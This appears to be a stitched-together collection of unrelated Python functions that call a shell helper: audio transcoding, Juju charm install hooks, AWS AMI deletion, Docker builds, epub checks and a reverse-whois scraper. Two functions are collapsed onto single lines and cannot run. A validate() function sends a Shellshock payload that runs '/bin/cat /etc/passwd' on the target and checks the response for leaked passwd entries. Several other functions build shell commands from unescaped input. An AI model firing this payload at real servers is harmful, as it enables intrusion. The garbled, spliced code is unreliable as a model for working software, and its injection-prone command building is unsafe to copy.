    erg = shell("./curl_call.sh %s" % url)

    ######## Test clean html start ################
    clean_html.copy_clean()
    ######## Test clean html Ende ################

    soup = BeautifulSoup(open('tmp/erg_clean.html'), 'html.parser')
    dom_table = soup.find_all('table')
    # assumes the result table is always the 4th <table> on the page
    dom_table = dom_table[3]

    with open('tmp/reverse_whois.txt', 'w') as r:
        for rows in dom_table.find_all('tr'):
            for cells in rows.find_all('td'):
                r.write(cells.text.ljust(35))
            r.write('\n')

    fh_out = open('tmp/reverse_whois.txt', 'r')
    for line in fh_out.readlines():
        print line.rstrip()
def AACPconvert(self,infile,outfile,logq):
    """Transcode a flac file to AAC (.mp4) via neroAacEnc, then tag the
    result with neroAacTag, reporting the outcome on logq."""
    # BUG FIX: startTime was referenced in the logq.put() calls below but
    # never assigned, raising NameError at runtime; start the timer here.
    startTime = time()
    inmetadata = flac().getflacmeta("\"" + infile + "\"")
    tagcmd = "%sneroAacTag " % neroaacpath
    try:
        metastring = self.generateNeroTags(inmetadata)
    except(UnboundLocalError):
        metastring = ""

    decoder = flacdecode(infile)()
    #wb stands for write-binary
    encoder = os.popen("%sneroAacEnc %s -if - -of %s.mp4 > /tmp/aacplusLog" % (
        neroaacpath,
        self.opts,
        shell().parseEscapechars(outfile),
    ) ,'wb',8192)

    for line in decoder.readlines(): #while data exists in the decoders buffer
        encoder.write(line) #write it to the encoders buffer

    decoder.flush() #if there is any data left in the buffer, clear it
    decoder.close() #somewhat self explanetory
    encoder.flush() #as above
    encoder.close()

    #Now as the final event, load up the tags
    rc = os.system("%s \"%s.mp4\" %s" % (tagcmd, outfile, metastring))
    # print "%s %s.mp4 %s" % (tagcmd, outfile, metastring)
    if rc != 0:
        logq.put([infile,outfile,"aacNero","WARNING: Could not tag AAC file",rc, time() - startTime])
    else:
        logq.put([infile,outfile,"aacNero","SUCCESS",0, time() - startTime])
def npm(cmd):
    """ Runs npm

    This layer relies on the use of npm scripts defined in `package.json`,
    see here https://docs.npmjs.com/misc/scripts for more information.

    Usage:

       npm('install')
       npm('run build')

    Arguments:
    cmd: Command to run can be string or list

    Returns:
    Will halt on error
    """
    hookenv.status_set(
        'maintenance',
        'Installing NPM dependencies in {}'.format(node_dist_dir()))
    os.chdir(node_dist_dir())

    # Guard: a non-string command cannot be composed into a shell line.
    if not isinstance(cmd, str):
        hookenv.status_set('blocked', '{}: should be a string'.format(cmd))
        sys.exit(0)

    result = shell("npm {}".format(cmd))
    if result.code > 0:
        hookenv.status_set("blocked", "NPM error: {}".format(result.errors()))
        sys.exit(0)
def composer(cmd):
    """ Runs composer

    Usage:

       composer('install')

    Arguments:
    cmd: command to run with composer

    Returns:
    Halts on error
    """
    hookenv.status_set(
        'maintenance',
        'Installing PHP dependencies in {}'.format(app_path()))

    # Make sure the application directory exists before entering it.
    target = app_path()
    if not os.path.isdir(target):
        os.makedirs(target)
    os.chdir(target)

    if not isinstance(cmd, str):
        hookenv.status_set('blocked', '{}: should be a string'.format(cmd))
        sys.exit(0)

    result = shell("composer {}".format(cmd))
    if result.code > 0:
        hookenv.status_set("blocked", "Composer error: {}".format(result.errors()))
        sys.exit(0)

    hookenv.status_set('active', 'ready')
def ami_delete(ami_name):
    """Deregister the AMI named ami_name (if present) and delete its
    backing EBS snapshot."""
    v = shell.shell_json(['aws', 'ec2', 'describe-images',
                          '--owners', 'self',
                          '--filters', 'Name=name,Values=' + ami_name])
    if (len(v['Images']) <= 0):
        print 'existing AMI ' + ami_name + ' not found'
    else:
        print 'deleting AMI ' + ami_name
        ami_id = v['Images'][0]['ImageId']
        # assumes a single block-device mapping backed by one EBS snapshot
        snapshot_id = v['Images'][0]['BlockDeviceMappings'][0]['Ebs']['SnapshotId']
        print ami_id
        print snapshot_id

        # Deregister first: the snapshot cannot be deleted while an AMI
        # still references it.
        shell.shell(['aws', 'ec2', 'deregister-image', '--image-id', ami_id])
        shell.shell(['aws', 'ec2', 'delete-snapshot', '--snapshot-id', snapshot_id])
def npm(cmd):
    """ Runs npm

    This layer relies on the use of npm scripts defined in `package.json`,
    see here https://docs.npmjs.com/misc/scripts for more information.

    Usage:

       npm('install')
       npm('run build')

    Arguments:
    cmd: Command to run can be string or list

    Returns:
    Will halt on error
    """
    status_set(
        'maintenance',
        'installing NPM dependencies for {}'.format(node_dist_dir()))
    os.chdir(node_dist_dir())
    if not isinstance(cmd, str):
        status_set('blocked', '{}: should be a string'.format(cmd))
        sys.exit(0)
    cmd = ("npm {}".format(cmd))
    sh = shell(cmd)
    if sh.code > 0:
        status_set("blocked", "NPM error: {}".format(sh.errors()))
        sys.exit(0)
def doc_send_text(args):
    """Copy the named doc into the send/me outbox and dispatch it.

    args[0] is a doc path (resolved via doc_path); prints usage when no
    argument is given.
    """
    if not args:
        print('usage: doc send doc-path')
        return
    outbox = doc_path('send/me')
    # FIX: use context managers — the original left both file handles open.
    with open(doc_path(args[0])) as src:
        body = src.read()
    with open(outbox, 'w') as dst:
        dst.write(body + '\n')
    print(shell('x send dispatch'))
def sh(pkg, ver, pkgpath, prefix, makefile, *args, **kwargs):
    """Install a package by executing its bash build script with the
    standard --prefix/--fakeroot/--python arguments."""
    if os.path.isfile(makefile):
        makefile = os.path.abspath(makefile)
    with pushd(pkgpath):
        # NOTE(review): abspath is applied a second time here; it is a no-op
        # when the branch above fired, otherwise it resolves the path
        # relative to pkgpath (the new cwd) — confirm that is intended.
        makefile = os.path.abspath(makefile)
        cmd = ['bash {} --prefix {}'.format(makefile, prefix),
               '--fakeroot {}'.format(kwargs['fakeroot']),
               '--python {}/bin/python'.format(prefix)]
        if 'jobs' in kwargs:
            cmd.append('--jobs {}'.format(kwargs['jobs']))
        if 'cmake' in kwargs:
            cmd.append('--cmake {}'.format(kwargs['cmake']))
        cmd.append(kwargs.get('makeopts'))
        print('Installing {} ({}) from sh'.format(pkg, ver))
        shell(cmd)
def validate(url):
    """Probe `url` for Shellshock by sending a crafted User-Agent and
    checking whether /etc/passwd content leaks into the response.

    Returns True when the payloaded response differs from a plain request
    AND contains a passwd-style line.
    """
    # curl -A "() { foo;};echo;/bin/cat /etc/passwd"
    cmd = 'curl --connect-timeout 30 --max-time 60 -A "() { foo;};echo;/bin/cat /etc/passwd" %s' % (url)
    oldcmd = 'curl --connect-timeout 30 --max-time 60 %s' % (url)
    # print cmd
    # Baseline fetch vs payloaded fetch; a diff alone is not enough
    # (dynamic pages), hence the passwd-format regex check as well.
    old_cont = shell(oldcmd).output(raw=True)
    new_cont = shell(cmd).output(raw=True)
    # passwd-style line: name:pw:uid:gid:gecos:home:shell
    p = re.compile(r'.*?:.*?:\d*?:\d*?:.*?:.*?:.*')
    '''
    match only report from start 0, please use search
    '''
    m = p.search(new_cont)
    if old_cont != new_cont and m:
        return True
    return False
def oggconvert(self,infile,outfile,logq):
    """Convert a flac file to ogg/vorbis via oggenc and report on logq."""
    #oggenc automatically parses the flac file + metadata, quite wonderful
    #really, we don't need to do anything here
    #The binary itself deals with the tag conversion etc
    #Which makes our life rather easy
    startTime = time()
    rc = os.system("%soggenc %s -Q -o %s.ogg %s" % (
        oggencpath,
        self.opts,
        shell().parseEscapechars(outfile),
        shell().parseEscapechars(infile)
    ) )
    if rc == 0:
        result="SUCCESS"
    else:
        result="ERROR:oggenc"
    logq.put([infile,outfile,"vorbis",result,rc, time() - startTime])
def install_app():
    """ Performs application installation """
    hookenv.log('Installing Huginn', 'info')

    # Configure NGINX vhost
    nginxlib.configure_site('default', 'vhost.conf')

    # Update application
    huginnlib.download_archive()
    # BUG FIX: str.format treated "{log,tmp/pids,tmp/sockets}" as a
    # replacement field and raised KeyError; double the braces so the
    # brace-expansion reaches the shell intact.
    shell("mkdir -p {}/{{log,tmp/pids,tmp/sockets}}".format(ruby_dist_dir()))
    # BUG FIX: the format string has two placeholders but only one argument
    # was supplied (IndexError); use an indexed field for both occurrences.
    shell("cp {0}/config/unicorn.rb.example "
          "{0}/config/unicorn.rb".format(ruby_dist_dir()))
    bundle("install --deployment --without development test")
    host.service_restart('nginx')
    hookenv.status_set('active', 'Huginn is installed!')
def check_dependencies():
    """Check external dependencies.

    Return a list with the available generators; exit with an error when
    neither calibre nor pandoc is installed.
    """
    available = []
    # Probe each generator by invoking it; a missing binary raises OSError.
    try:
        shell('ebook-convert')
        available.append('calibre')
    except OSError:
        pass
    try:
        shell('pandoc --help')
        available.append('pandoc')
    except OSError:
        pass
    if not available:
        sys.exit(error('No generator found, you cannot use md2ebook.'))
    # epubcheck is optional; this only warns when it is absent.
    check_dependency_epubcheck()
    return available
def build(workspace, host, repository, tag, authenticator=None):
    """Tar the workspace and POST it to a docker daemon's /build endpoint,
    tagging the resulting image repository:tag."""
    try:
        # Check that Dockerfile is in cwd
        assert os.path.isfile('Dockerfile'), 'Dockerfile is missing in cwd.'

        # Tar job
        tar_out = "{0}.tgz".format(os.path.basename(workspace if workspace[-1] != "/" else workspace[:-1]))
        command = """tar cfz {0} -C {1} .""".format(tar_out, workspace)
        code, lines = shell(command)
        #assert code == 0, 'tar failure'

        # Upload build job
        command = """curl --header "Content-Type:application/octet-stream" --data-binary @{0} http://{1}/build?forcerm=1\&t={2}:{3}""".format(
            tar_out, host, repository, tag)
        code, lines = shell(command)
        assert code == 0, 'non zero ({0}) build curl exit code ?'.format(code)
        assert len(lines) > 1, 'no stdout (docker daemon error ?)'

        # # - retrieve the build id using a regex (super ugly)
        # try:
        #     last = json.loads(lines[-2])
        # except ValueError:
        #     assert 0, 'invalid dockerfile ("%s")' % lines[-2]
        # assert 'stream' in last, 'build error ("%s")' % last
        # matched = re.match('Successfully built ([a-zA-Z0-9]+)\n', last['stream'])
        # assert matched, 'unable to find the image id ("%s")' % last['stream']
        # aka = matched.group(1)
        # # - fix the damn build image name bug thing and finally tag our image as 'latest'
        # command = """curl -X POST http://{0}/images/{1}/tag?repo={2}\&force=1\&tag={3}""".format(host, aka, repository, tag)
        # print command
        # code, lines = shell(command)

        # Clean up the temporary tarball regardless of build id handling.
        os.remove(tar_out)
    except Exception as e:
        print "Build Exception"
        print e
        raise e
def git(cmd):
    """Run a git subcommand, installing git first when it is missing.

    cmd -- the arguments to pass to git, e.g. 'clone <url>'

    Blocks the unit (juju status 'blocked') and exits the process when
    git returns a non-zero exit code.
    """
    # Install git on demand the first time it is needed
    if not os.path.isfile('/usr/bin/git'):
        apt_install(['git'])
    sh = shell("git {}".format(cmd))
    if sh.code > 0:
        # BUG FIX: the status message said "Problem with Ruby" -- a
        # copy-paste slip in a git wrapper; report git instead.
        hookenv.status_set('blocked',
                           'Problem with git: {}'.format(sh.errors()))
        sys.exit(1)
def show_differences(f1, f2):
    """Print the diff between *f1* and *f2*.

    Reports a missing file (f1 checked first) instead of diffing, and
    says so when the files do not differ.
    """
    # Guard: both files must exist; report the first missing one
    for candidate in (f1, f2):
        if not exists(candidate):
            print('File does not exist, %s' % candidate)
            return
    if not differences(f1, f2):
        print('No differences in %s and %s' % (f1, f2))
        return
    # Show a banner with the path relative to the source dir, then the diff
    print(banner(f1.replace(src_dir() + '/', '')))
    print(shell('diff %s %s' % (f1, f2)))
def install_app():
    """Deploy Huginn behind NGINX.

    Configures the vhost, downloads the application archive, prepares the
    unicorn runtime, installs the gem bundle, ships the charm's Procfile,
    precompiles assets, restarts NGINX and marks the unit active.
    """
    hookenv.log('Installing Huginn', 'info')

    # NGINX virtual host pointing at the Ruby dist directory
    nginxlib.configure_site('default', 'vhost.conf',
                            app_path=ruby_dist_dir())

    # Fetch/refresh the application code and lay out unicorn's dirs/config
    huginnlib.download_archive()
    shell("mkdir -p %s/{log,tmp/pids,tmp/sockets}" % (ruby_dist_dir()))
    shell("cp %(dir)s/config/unicorn.rb.example "
          "%(dir)s/config/unicorn.rb" % {'dir': ruby_dist_dir()})
    bundle("install --deployment --without development test")

    # Ship our Procfile from the charm templates into the app root
    template_procfile = path.join(hookenv.charm_dir(), 'templates/Procfile')
    shell("cp %(procfile)s %(dir)s/Procfile" % {
        'procfile': template_procfile,
        'dir': ruby_dist_dir(),
    })
    bundle("exec rake assets:precompile RAILS_ENV=production")

    host.service_restart('nginx')
    hookenv.status_set('active', 'Huginn is installed!')
def run(): try: # Read CL arguments parser = argparse.ArgumentParser() parser.add_argument('repository', help='Repository of the built image, e.g. timmy/testy_image') parser.add_argument('-p', '--port', help='Port in docker configuration for the daemon. Defaulted to :4243.', type=int, default=4243) parser.add_argument('-w', '--workspace', help='Location of project with Dockerfile at its root. Defaulted to $WORKSPACE.', default=os.getenv('WORKSPACE')) parser.add_argument('-t', '--tag', help='Tag for the image. Defaulted to y-m-d-h-m-s (now).', default=datetime.now().strftime('%Y-%m-%d-%H-%M-%S')) parser.add_argument('-cp', '--config_path', help='Path to the docker config file. Default is /home/jenkins/.dockercfg', default='/home/jenkins/.dockercfg') # Look up gateway IP for docker daemon code, lines = shell("netstat -nr | grep '^0\.0\.0\.0' | awk '{print $2}'") assert code == 0, 'failure to lookup our gateway IP ?' host = lines[0] #assert host != '', 'Could not find gateway IP' args = parser.parse_args() repo = args.repository print "Repository set to {0}".format(repo) port = args.port host = "{0}:{1}".format(host, port) print "Daemon host set to {0}".format(host) workspace = args.workspace assert os.getenv('WORKSPACE') != '', 'No $WORKSPACE environment variable. Are you calling this from the Jenkins master?' print "Workspace set to {0}".format(workspace) tag = args.tag print "Tag set to {0}".format(tag) config_path = args.config_path print "Path to docker config set to {0}".format(config_path) authenticator = Authenticator() # Enter workflow below build(workspace, host, repo, tag, authenticator=authenticator) push(host, repo, tag, authenticator=authenticator) return 0 except Exception as e: print e return 1
def src_diff(args):
    """Diff source files against their base copies.

    With an argument, diffs that single file; with none, walks every
    source file and prints the diff for each one that changed.
    """
    if args:
        # Single file: delegate to show_differences for the reporting
        show_differences(join(src_dir(), args[0]),
                         join(src_base(), args[0]))
        return
    for src_file in list_source_files(src_dir()):
        base_file = src_file.replace(src_dir(), src_base())
        # Only compare pairs where both sides exist
        if not (exists(src_file) and exists(base_file)):
            continue
        if differences(src_file, base_file):
            print(banner(src_file.replace(src_dir() + '/', '')))
            print(shell('diff %s %s' % (src_file, base_file)))
def calculate(filename, folder="./", store_output=True):
    """Run GAMESS on *filename* via the configured rungms wrapper.

    filename     -- GAMESS input deck, e.g. 'job.inp'
    folder       -- directory the .log file is written into (default cwd)
    store_output -- when True, redirect stdout into <folder>/<name>.log

    Returns the (stdout, stderr) pair from the shell call.
    """
    cmd = __rungms__ + " " + filename
    if store_output:
        logfile = filename.replace(".inp", ".log")
        # BUG FIX: plain concatenation `folder + logfile` produced e.g.
        # 'dirjob.log' whenever folder lacked a trailing slash;
        # os.path.join handles both forms correctly.
        cmd += " > " + os.path.join(folder, logfile)
    stdout, stderr = shell.shell(cmd, shell=True)
    return stdout, stderr
def check(self): "Checks EPUB integrity" config = self.load_config() if not check_dependency_epubcheck(): sys.exit(error('Unavailable command.')) epub_file = u"%s.epub" % config['fileroot'] epub_path = join(CWD, 'build', epub_file) print success("Starting to check %s..." % epub_file) epubcheck = u'epubcheck %s' % epub_path epubcheck = shell(epubcheck.encode()) for line in epubcheck.errors(): print error(line) for line in epubcheck.output(): print line